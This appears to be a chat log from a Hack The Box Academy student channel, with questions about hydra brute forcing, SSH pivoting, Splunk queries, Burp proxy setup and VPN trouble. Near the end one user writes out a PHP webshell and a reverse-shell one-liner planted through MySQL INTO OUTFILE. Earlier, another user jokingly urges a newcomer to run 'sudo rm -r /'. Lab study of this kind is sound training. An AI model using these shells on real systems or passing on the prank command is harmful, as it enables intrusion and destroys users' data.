so we can shed the light onto others - that 48 is the magic number

you can maybe get away in the 50s

but i like going by 16

64 didn't work, drop to 48

If I do not already know the password, how can I do trial and error?

observe the packets

In this particular exercise, yes. But in other scenarios?

hydra has a verbose mode

you're basically DoSing the service if you hammer it too much. you're overwhelming it with data it can't process in time.

in other scenarios; if you're attacking the same target you can generally apply same rules

if a low number works try not to go too much higher

in an rl scenario you work bottom up; and in an rl engagement USUALLY it's written within the Rules of Engagement to try not to DoS their infra

You are brute forcing FTP right?

Yup

sometimes they'll even tell you what to avoid bruteforcing altogether

the password is trivial, we're talking about sending packets to a service that cannot handle the requests

and I get wanting to understand the methodology of "but how would we figure it out"

in an rl scenario we just let hydra run its defaults

because you're not on any kind of timer

in terms of target being up or server time for your machine

so you can leave a bruteforce overnight while you sleep

While you play ASMR music in the background and wake up to a successful password finding

Hey in the Remote/Reverse Port Forwarding with SSH. how do i do following "We can download this backupscript.exe from the Windows host via a web browser or the PowerShell cmdlet Invoke-WebRequest.

Remote/Reverse Port Forwarding with SSH
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" . how can i do it with ssh. this command is not working

Thank you all for the great insights!

"this command is not working" isn't really descriptive

i take it you have a port forward listening on 8123 to point back to your localhost webserver port to transfer the file?

i meant like how i can open powershell with ssh

iam not able to understand

when you ssh into a windows machine usually it's already running powershell

if you see PS in front of the CWD> then congrats, powershell

if not then just type "Powershell"

and voila, you're dropped into a powershell session

it's really as simple as that

just remember, these are isolated machines that we can beat up all we want so we can develop a proper methodology

doing the pivoting module. i can use the ubuntu server that pivots to windows machine

whatever gets you to the windows machine

¯_(ツ)_/¯

What command will print my current working directory onto the console?

whaaaat

ls and dir do show the directory but not exactly what its looking for
kinda lost here

pwd

oh shit

print working directory

dang yeah makes sense

thanks man
couldnt find anything on google

Footprinting Lab - Hard

Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.

I have access to tom details already, but am lost what next.

but its incorrect

it's always a good idea to see what a user was doing when you get access to the user

Poor security practices for Tom

holy shit it was cd

___c___hange ___d___iretory

seriously someone needs to talk to htb about their security practice these boxes are horrible

ye but it said print current directory
i was a bit skeptical if it was cd
even though i used it and nothing happened in console

Unless you mean cwd

Which is the current working directory

yeah idk
i did cd and the answer was correct

but like in console (through linux) it did this

and i got hella confused

Cd just goes to home

man idk idk
im still confused but hey i finished that part so onto the next one

yeah but how was that the correct answer

thats whats like confusing me

The answer was the home directory

What module/section?

introduction to windows command line
page 4 system navigation

ah it's just dumb

see?

i forgot cd works different in windows

That is correct

lol

our original context was thinking it was linux

yeah i also kinda forgot
i got used to linux ngl

although you can still see the current path youre in...

naw i thought it was windows lol. pwd is still correct

cd in linux sends you home without a variable

yup

pwd is still correct, but the hint points to cd

alongside that, that's what's talked about in this section

if thats windows then pwd isnt a cmd anyway

yeah it was correct
that would make more sense

pwd isn't mentioned

pwd is a windows command

at least in powershell

it's a powershell alias

for Get-Location

mmmm in a cmdprompt its not a recognised cmd....

for some reason i recall already trying cd but it was wrong
holy shit dude i might have insomnia

windows equivalent is cd to linux pwd

probably had an extra space

yeah perhaps

hey just a quick question did u already passed web exploitation expert path ?

fuck no

i don't got the money for that

🤣

how many paths have u already completed

?

RAAAAAHHH
that Medium difficulty kinda scares me
yk? like im still in fundamentals and easy, still struggling a bit

it's actually not just make sure you do your own research on each module and always keep the notes and it will be easy win trust me

should be fun

yeah for now sure

for now? aw hell nah how bad things are gonna get dude

your basics should be cleared and each module will help you with that for sure but you have to harden your concepts if you don't even a fundamental will be hectic

yes ofc

best of luck

there is only God not luck

oh.. so may Christ be with you on this hard journey

🗣️ 💯

Only a few people have completed this path so far

have u ?

not yet

ig you've already completed the other 3 right ?

2 questions,
how can you have read/write without having change permission
and why is the permissions called modify if you don't have the change permission

Yes, I have completed all other paths

sounds like you're slacking a bit then

the cwee modules i've done so far have been a lot of fun

With read/write you can read and write files, but not delete them

C# is killing me

That’s just so cool jbh🔥

But you could just delete all the files contents right?

You should first try it on your Linux try sudo rm -r /

yes, but the file remains

https://tenor.com/view/troll-get-trolled-we-do-a-little-trolling-gif-20266975

also u forgor the f

**

😂😂😂

I'm stupid, I just googled it an immediatly found the answer 💀 sorry chat

Hi im new in here and in htb in general

the problem is I cannot finish the first task in htb red team due to to able connect in open vpn

if i could get some help ill be grateful

Could you specify what have you tried?

do you have the openvpn file downloaded?

yes

but i have wsl so i cannot open the kali linux downloads folder to install it

You're in WSL?

yes

I wouldn't recommend

wsl is just going to be trouble

use the pwnbox or a vm

yeah ^

there are some tools that you need a GUI for

I have win kex for the gui

but im not able to put the openvpn file in the downloads in kali

you really should strongly consider not using wsl. not many here will be able to help you because almost no one uses it, if anyone.

had C# in high school and college as main lang. i dont like it

shit

guess I'll figure out a way

To start the vpn connection you need to run

sudo openvpn file_path

where the file_path is the path to the file / the name of the file if its in the current directory

Then look forward to the Advanced Deserialization Attacks module 😉

if you're using wsl you might already be logged in as root so you might not need the sudo

but also It's possible that Windows could block you from doing this so you'll have to run it as administrator but I wouldn't recommned using the openvpn on your main machine

json? hmm i think we had to work on bunch of ser/ des in college. and no i dont look forward to

Then this module should be easy for you.
Yes, json, xml and binary

i mean my skills in coding are like "why dis not work?"
proceeds to ask my best friend
Idk i dont like coding anymore, and still coding one is different then exploiting, tho i never serilize a binary

ON to UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK: Introduction To Splunk & SPL
Question:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests. Enter it as your answer.

I am kinda new to splunk. Can anyone point out why SPL queries are not working??? Even those mentioned in the module are NOT providing any output

Any nudges???

Hello

Well, I know why it doesn't work. I'm just too stupid to hide it so that it gets through the filter

LOL, well if you ever have a question about C# pls dont ask me good luck. ill need to first finish CPTS path before going into Advanced Deserialization Attacks module

I'll be sure to dm you all my questions

https://tenor.com/view/im-dead-dead-bruh-skeleton-dead-bruh-skeleton-dead-im-dead-bruh-gif-26854866

i can almost get a tier 3 module i have 2 choices but i cant decide one 1) Binary Fuzzing, 2) Advanced XSS and CSRF Exploitation, i need help choosing between them

choose 2nd one it;s the best

well it all depends on your interest tbh

ok i guess that makes sense binary fuzzing is good but less applicable i guess

mac os fundamentals

i dont have any machine spawn, i dont understand what to do

what is wrong with this bruh

hello, for port forwading module why my proxy doesn't work ? https://academy.hackthebox.com/module/158/section/1431
it's a vm windows and i've open vpn

also with plink he doens't work ...

Hi. I'm trying to do the Login Brute Forcing module on my own Kali machine. I'm on the Determine Login Parameters-section, where the tutorial shows using a combination of Foxy Proxy and Burp Suite to go through HTTP requests. My problem is; on my own machine, I cannot seem to find a switch to activate the Burp proxy in Foxy Proxy.

Like in this picture.

there is something definitely wrong

I know I could just use the pwnbox, but I want to be able to do this on my own machine.

you need to add it in options

open foxyproxy -> options -> add -> fill 127.0.0.1, 8080, name to burpsuite

Ok. I tried to do that, but probably did something wrong. I've never configured a proxy before. I added a test-proxy in options with name 127.0.0.1 and 8080, but burp still don't show up in my Foxy Proxy

did you save it

Also, when using that proxy I can't access any websites on my chromium browser, I just get "This site can't be reached error"

aaah

maybe just use this open browser and do

Now I got itthanks alot

this section in windows attacks and defense is absolutely broken pls fix it

Anyone?
Any CDSA aspiring/completed guys?

dont specify sourcetype

make sure u specify the time to last 25 years/All Time

on the right side of the query

i did that module yesterday there was some problem with sysmon, just dont specify it

Thanks @candid lily @inland shoal
I will try again

why is this not being accepted

ohh from my target** nvm

any idea how to make dig use tcp

bruhhh

instead of .htb i was using .com

Intrusion Detection With Splunk (Real-world Scenario)

Q3 - Find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe

I've been on this for days now. Filtering for clr.dll, trying to find unknown call traces, event code 10s, stats count by target image and countless other variations of what's given in the module , and still coming up with nothing. Lost count of how many .exes I've tried to enter in the answer. How am I so far off with this one ? Hints or DMs appreciated.

for the digital forensics module, does the result download take awhile

ive been stuck here for 1 hour 💀 fk rdp

Can anybody explain to me how I should read this thing? I tried going the microsoft page where they put this diagram but I can understand where do I start to read it

the download is ready. you have to click the name of the download

omg LOL

thanks alot man, tfw the module didnt even show the file there

Hi bros i stuck in the LOGIN BRUTE FORCING-Skills Assessment second question " Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag." could you help me out?
I already have the other user and I have the list that is in the home (rockyou-30.txt). My question is how do I brute force from there which port should I use? I tried hydra -l useretc -P rockyou ... ftp: //127.0.0.1 -t4. Or what IP and port should the attack launch? All my attempts mark my connection refused.

there seems to be a space in your ftp://127.0.0.1

I deleted the space, still the same no result, no password cracked out

I have some queries about uploading php reverse shells using mysql.

I am able to obtain a webshell using SELECT "<?php echo system($_GET['cmd']);?>" INTO OUTFILE '<directory>'; and execute it. However, when I try more complex things like SELECT “<?php -r ”$sock=fsockopen("<ip address>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");"?>" INTO OUTFILE “<directory>”, I run into syntax errors while saving the file, as well as when executing the webpage.

Is it not possible to upload a reverse shell using mysql? I can't seem to find much about this online

It's because of thr quotes brother

Being honest anything involving multiple quote sets just won't work

are you in the same dir as the rockyou?

I've been adjusting the quotes, its either I encounter syntax error while trying to upload using mysql, or being unable to execute it from the webpage. I guess I'll stick to the webshell then